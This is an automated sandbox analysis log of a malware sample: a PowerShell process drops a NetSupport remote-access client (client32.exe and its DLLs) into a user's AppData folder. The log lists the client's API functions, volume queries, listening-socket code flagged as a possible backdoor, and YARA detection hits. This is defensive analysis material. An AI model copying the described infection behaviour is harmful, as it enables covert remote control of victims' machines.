___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 37_2_6CCB02AD
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 37_2_6CCB2218
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 37_2_6CCB1CC1
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoA, 37_2_6CCBDC99
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 37_2_6CCBDC56
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 37_2_6CCB1DB6
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 37_2_6CCB1EB8
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 37_2_6CCB1E5D
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 37_2_6CCAFAE1
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 37_2_6CCBDB7C
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 37_2_6CCB1680
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA30486 CreateNamedPipeW, 34_2_00007FFC8BA30486
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11177075 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 37_2_11177075
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA, 37_2_1103B160
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 37_2_11174AE9
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111450A0 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey, 37_2_111450A0
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep, 37_2_11070090
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError, 37_2_110D8200
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC8A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange, 37_2_6CC8A980
Yara detected NetSupport remote tool
Source: Yara match File source: 37.0.client32.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.client32.exe.707b0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.powershell.exe.28fcf164fe0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.powershell.exe.28fcf0141a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.client32.exe.6cf80000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.powershell.exe.28fcf01e3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.client32.exe.111b79e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.client32.exe.6cc80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2428598700.00000000111E1000.00000004.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.1919964679.0000000000D3F000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1908768239.0000028FCF157000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.1919964679.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2428248444.0000000011193000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2500, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 6788, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\client32.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\pcicapi.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\PCICHEK.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL, type: DROPPED